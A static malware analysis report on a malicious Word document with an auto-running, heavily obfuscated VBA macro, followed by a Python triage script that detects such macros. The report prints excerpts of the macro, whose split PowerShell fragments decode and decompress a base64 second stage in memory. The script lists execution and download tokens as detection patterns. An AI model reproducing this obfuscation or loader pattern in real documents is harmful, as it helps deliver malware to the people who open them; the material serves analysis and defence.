Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d47ebfb2c289a09c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 162.5 KB
Created: 2018-04-03 16:40:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12

MD5: 22a7e826eae7bdba08e2b385b71dce43
SHA-1: df9c4c1bedea84e89a48e396157be4da8ca682c8
SHA-256: d47ebfb2c289a09c689f536203f8940f764296339d46a977700f55bbacceea42

Risk Score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document in the legacy OLE container whose VBA project declares an AutoOpen procedure, so the macro runs as soon as a user opens the document with macros enabled (T1204.002 leading into T1059.005). The macro is heavily obfuscated: every call to the string-decoding function nLSbN(...) is surrounded by junk arithmetic on undefined variables (harmless under On Error Resume Next), and the decoded strings are themselves PowerShell fragments split with '+' concatenation and randomised casing. Collapsing that concatenation in the visible fragments yields System.IO.Compression, [IO.MemoryStream][Convert]::FromBase64String, New-Object and IO.StreamReader with [Text.Encoding]::ASCII, i.e. a base64-encoded, compressed second stage that is decoded in memory rather than written to disk. CreateObject is present (OLE_VBA_CREATEOBJ) and is the usual way such a macro obtains a shell object to launch that command, but the call itself, the nLSbN decoder and the final command line all fall outside the truncated preview, so this report does not recover the second stage or any download URL it may contain. The ClamAV signature Doc.Malware.Emodldr-10025032-0 fires on the container (the decoded macros.bas alone is not detected; see Extracted artifacts).

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project declares an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, the usual route to WScript.Shell, Shell.Application or a similar COM object used to launch a command.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable; here it corroborates the AutoOpen and CreateObject findings from the decoded source.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule text conflicts with the other findings on this page (a VBA project was recovered and is listed under Extracted artifacts), so treat the marker as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. Here the artifact is macros.bas (see below), flagged for its long base64-like blobs.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace URI present in any modern Office document and is not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  42315 bytes

SHA-256: f4147c52d70b070fb09898b48d68de2f7c8e04aad06e24e4191c7c55d54ef3dd
Detection: ClamAV: No threats found. The ClamAV signature above matched the OLE container, not the decoded VBA text, so the absence of a hit on this artifact does not weaken the verdict.
Obfuscation or payload: likely. The carved artifact contains 9 long base64-like blobs (the first arguments to nLSbN(...) in the preview).
Preview: first 1,000 lines of the extracted script (the listing on this page is cut off well before that point)
Attribute VB_Name = "mYjajBCkjj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aiQBpUwEdi"
Function DdzpoZwtrKzfM()
On Error Resume Next
hBcaqs = 14356 * 27530
GBBRj = (47359 + CDate(1083 / Atn(RoUnvE)) / 98299 * XYVrj * 70971 * CInt(HJWnEM) * BsFwCc / CSng(YOGJw))
jlClw = Tan(55851)
cLPpELMa = nLSbN("SzehyruO8P7+Nz8tn183MfsVa5s4n7TItqN389yW9fadSn7obXvq3jvXuw+vse66FdV9ocY", 2, 65)
TUmWW = 41344 * 25191
IMlwQp = (75711 + CDate(55241 / Atn(zCWKwJ)) / 27499 * nWEWGl * 82347 * CInt(zIjFjZ) * PGQBVN / CSng(XwIVlu))
EUKYo = Tan(67503)
OnYUtA = 37133 * 4636
PiHXz = (97439 + CDate(57005 / Atn(lwFwTc)) / 71528 * iUVOt * 57977 * CInt(ihAoZf) * tQmdTE / CSng(wSiniL))
LjvKn = Tan(36120)
XcCQRmABh = nLSbN("h4RGj'+'ECT') ('Sy'+'StEM.IO.'+'COmp'+'ressioN.d'+'EZ9K,U", 5, 48)
jzojl = 84145 * 47772
zJENED = (79071 + CDate(18215 / Atn(IjJfBn)) / 50581 * TfWBF * 57508 * CInt(MSNTww) * MTITYj / CSng(GIWWF))
GJiiK = Tan(27105)
WZWrE = 96977 * 36679
AtlYlN = (25118 + CDate(94414 / Atn(JNKfo)) / 60051 * SKoku * 30825 * CInt(sHpZz) * PlEqG / CSng(sLiWz))
UBKMt = Tan(54215)
zCuUtQ = nLSbN("UWBR921bMh3pXhkrjoGnT9wPswwOSZF", 4, 22)
uzYtKi = 86063 * 70619
sQwoPp = (89042 + CDate(46216 / Atn(TZkmL)) / 78037 * pXaOIf * 26213 * CInt(rDIqs) * INSRSN / CSng(KwfHlD))
CzHnj = Tan(12041)
VRmwC = 31015 * 75049
TOJbw = (85634 + CDate(67705 / Atn(YjBVu)) / 34629 * WnGMA * 554 * CInt(IOHrXZ) * aNjzq / CSng(oGjzB))
DrpWR = Tan(44674)
jYtvLmATuML = nLSbN("GFLlsfL'+'ATEstRE'+'Am')( [IO.meMoRYsTrEAM][conVerT]::fROmBASE64stRing( 'TVjbbttIFvwVPywQB1AMkaLsOMA8tCJG5u42FVpmFq0gD45WS8mykxnbCWVhP376VBUpBzAYXrrPrU6dap2dnvxjXf7+sJr7xZ/r1ddskJ4PiGJ", 6, 176)
HPIwD = 74292 * 47882
FvTGUK = (20185 + CDate(96729 / Atn(UYDLU)) / 31177 * HKuwi * 36456 * CInt(qTURkR) * cKRNi / CSng(Psjvs))
WCtTrm = Tan(99276)
qzBJzw = 70954 * 53940
iRTjdq = (91110 + CDate(2933 / Atn(aRjFr)) / 10338 * Ipdrt * 6494 * CInt(kwKuOQ) * wntPk / CSng(TnkwZ))
mUfPk = Tan(15298)
XRCPqku = nLSbN("Uv/J0BL6mtKx1x54Urj32CrR+SJ72mph", 2, 24)
rpHHki = 51993 * 61769
nSwjlE = (57407 + CDate(57217 / Atn(pHqzUE)) / 60145 * URREh * 49903 * CInt(SYbpjJ) * JjkARB / CSng(nhqBbv))
GsUCb = Tan(33647)
siMDG = 45672 * 10734
mYjdw = (20430 + CDate(37073 / Atn(vjzKMz)) / 9460 * TbAMz * 54417 * CInt(OirVqq) * OinlCZ / CSng(jbESR))
uZnvv = Tan(56660)
SDPzSoiNCUA = nLSbN("9WJBHwpD/IL6t+32AkxgP+Jz8h3xFntqjDsCJ1UP96FRvR3z7ivYxV9BXhp+i77Ngfs2wX0s/WMe58uxb9jP5rZId85t8P4f/njhg/Q7sM9vHMT/M01uz", 7, 109)
jiXsDK = 52487 * 32908
FpdmTV = (41929 + CDate(44114 / Atn(ufGnAw)) / 89345 * TDpqvZ * 24328 * CInt(sjGvis) * phWOpf / CSng(YDQUAw))
wibwXq = Tan(46397)
mAawZE = 6801 * 71783
mpjYs = (57747 + CDate(18347 / Atn(ohGEJ)) / 85090 * LWLkMM * 15361 * CInt(CrviQF) * bdwaw / CSng(ZfnmY))
bjktc = Tan(15053)
TPLiCnQqik = nLSbN("L1LluIjPQvWqzc4I9XXMqzd7M+SD/uG9+hv5tPrVyq/FZ3YMz7Qb0Jc58zpTv5rdSvhwrBfrtGN9WO+h+rRlXLTH+iNPwFn0d8/nygvsriy/B/XtmLg3P7s65VYP8Yjti3omhkeP9cDVHfqtNfxXzB/7Af0e/UpVj3usa1kf9iXysEcfGh7MTyd+qthHviF/wF/Bwb", 5, 191)
kCsTYr = 57939 * 88684
hzvtQR = (11532 + CDate(57259 / Atn(ivomr)) / 47697 * oCjMSw * 36306 * CInt(oUUjJZ) * SQvwpr / CSng(tKdGnt))
nwLTV = Tan(69956)
iXjkL = 15450 * 55070
DfilNr = (61198 + CDate(46252 / Atn(Orknr)) / 12191 * WYZAG * 30705 * CInt(bbDnMj) * TUVXUZ / CSng(RLwaHc))
QERnRT = Tan(26237)
mdrRofIcFtG = nLSbN("iuGziRfEy9ocf9K/s5z95zKD", 4, 18)
icTnqC = 20630 * 19505
TrYvX = (27807 + CDate(29907 / Atn(hnEMc)) / 49870 * nzLWlz * 90525 * CInt(cjltD) * iZGBrH / CSng(DuspC))
kfIbF = Tan(4482)
jvcXKL = 87320 * 18680
RJoLH = (89929 + CDate(31300 / Atn(JLoSV)) / 80891 * XCrMPi * 69037 * CInt(iXzrnP) * wvLoi / CSng(UtVit))
XUsiO = Tan(10923)
SzCOZYvf = nLSbN("WzL('n'+'ew-obj'+'ECT')  ('i'+'o'+'.streAmR'+'eADEr')($_ ,[TEXt.eNCOdIng]::AsciI) n ,v", 4, 79)
AITjuu = 64138 * 58120
oHDco = (91475 + CDate(28982 / Atn(HjLNCJ)) / 41553 * VaM
... (truncated)
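The heuristics above (auto-exec entry point, CreateObject, base64-like blobs) and the string fragments visible in the preview can be reproduced with a few lines of static triage. The following is an added example written for this page; it is not the report's own tooling and not part of oletools. The sample it runs on is constructed: the nLSbN(...) lines are copied from the preview, while the Sub AutoOpen and the CreateObject("WScript.Shell") line are invented stand-ins for the entry point and object creation the heuristics report but the truncated preview does not show. The nLSbN decoder is unknown and is not reimplemented; the example only collapses the PowerShell-style 'a'+'b' concatenation, which is why DeflateStream (visible only as "...ATEstRE'+'Am") is not recovered while the other primitives are. The token and marker lists are the example's own, not olevba's.

```python
"""Static triage of decoded VBA source, modelled on the report's heuristics.

Added example for this page; not the report's tooling and not oletools code.
SAMPLE_VBA is constructed: nLSbN lines come from the preview, the AutoOpen
Sub and the CreateObject line are invented stand-ins.  nLSbN is not decoded.
"""
import re

SAMPLE_VBA = r'''Attribute VB_Name = "aiQBpUwEdi"
Sub AutoOpen()
    DdzpoZwtrKzfM
End Sub
Function DdzpoZwtrKzfM()
On Error Resume Next
hBcaqs = 14356 * 27530
cLPpELMa = nLSbN("SzehyruO8P7+Nz8tn183MfsVa5s4n7TItqN389yW9fadSn7obXvq3jvXuw+vse66FdV9ocY", 2, 65)
XcCQRmABh = nLSbN("h4RGj'+'ECT') ('Sy'+'StEM.IO.'+'COmp'+'ressioN.d'+'EZ9K,U", 5, 48)
jYtvLmATuML = nLSbN("GFLlsfL'+'ATEstRE'+'Am')( [IO.meMoRYsTrEAM][conVerT]::fROmBASE64stRing( 'TVjbbttIFvwVPywQB1AMkaLsOMA8tCJG5u42FVpmFq0gD45WS8mykxnbCWVhP376VBUpBzAYXrrPrU6dap2dnvxjXf7+sJr7xZ/r1ddskJ4PiGJ", 6, 176)
SzCOZYvf = nLSbN("WzL('n'+'ew-obj'+'ECT')  ('i'+'o'+'.streAmR'+'eADEr')($_ ,[TEXt.eNCOdIng]::AsciI) n ,v", 4, 79)
Set sh = CreateObject("WScript.Shell")
End Function
'''

# Auto-execution entry points; the report's OLE_VBA_AUTOOPEN fires on AutoOpen.
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open", "Workbook_Open")
# Object-creation / execution tokens.  Together with an auto-exec name they form
# the combination behind OLE_VBA_PCODE_AUTOEXEC_EXEC.
EXEC_TOKENS = ("CreateObject", "Shell", "WScript.Shell", "Run", "Exec", "powershell")
# Lower-cased PowerShell primitives searched for after concatenation collapse.
POWERSHELL_MARKERS = (
    "new-object", "system.io.compression", "deflatestream", "memorystream",
    "frombase64string", "streamreader", "invoke-expression", "downloadstring",
)
# "Long base64-like blob": a run of at least 40 base64 alphabet characters.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# PowerShell string concatenation joint: 'Sy'+'StEM' -> 'SyStEM'.
CONCAT = re.compile(r"'\s*\+\s*'")


def find_autoexec(src):
    """Return canonical auto-exec procedure names declared in src (VBA is case-insensitive)."""
    canon = {n.lower(): n for n in AUTOEXEC_NAMES}
    pat = re.compile(r"\b(?:Sub|Function)\s+(%s)\b" % "|".join(AUTOEXEC_NAMES), re.I)
    return sorted({canon[m.group(1).lower()] for m in pat.finditer(src)})


def find_exec_tokens(src):
    """Return execution/object tokens present as whole words (case-insensitive)."""
    return sorted(t for t in EXEC_TOKENS
                  if re.search(r"\b%s\b" % re.escape(t), src, re.I))


def find_blobs(src):
    """Return every long base64-like run, e.g. the first argument of each nLSbN call."""
    return BASE64_BLOB.findall(src)


def collapse_concat(s):
    """Join 'a'+'b' fragments so split PowerShell names become searchable."""
    return CONCAT.sub("", s)


def find_powershell_markers(src):
    """Markers visible once concatenation is collapsed and casing normalised."""
    flat = collapse_concat(src).lower()
    return sorted(m for m in POWERSHELL_MARKERS if m in flat)


def triage(src):
    """Summarise the findings the way the report's heuristic list does."""
    autoexec = find_autoexec(src)
    exec_tokens = find_exec_tokens(src)
    blobs = find_blobs(src)
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "autoexec_with_exec": bool(autoexec and exec_tokens),
        "blob_count": len(blobs),
        "longest_blob": max((len(b) for b in blobs), default=0),
        "powershell_markers": find_powershell_markers(src),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the constructed sample the triage reports AutoOpen as the entry point, CreateObject and WScript.Shell as execution tokens, two long blobs, and the New-Object / System.IO.Compression / MemoryStream / FromBase64String / StreamReader markers, which is exactly the in-memory base64-then-decompress pattern the summary describes. Against the real macros.bas the blob count should come out at the report's 9; the nLSbN arguments are not plain base64 (the extra numeric parameters suggest an offset/length transform), so do not expect base64.b64decode to succeed on them without first recovering the decoder.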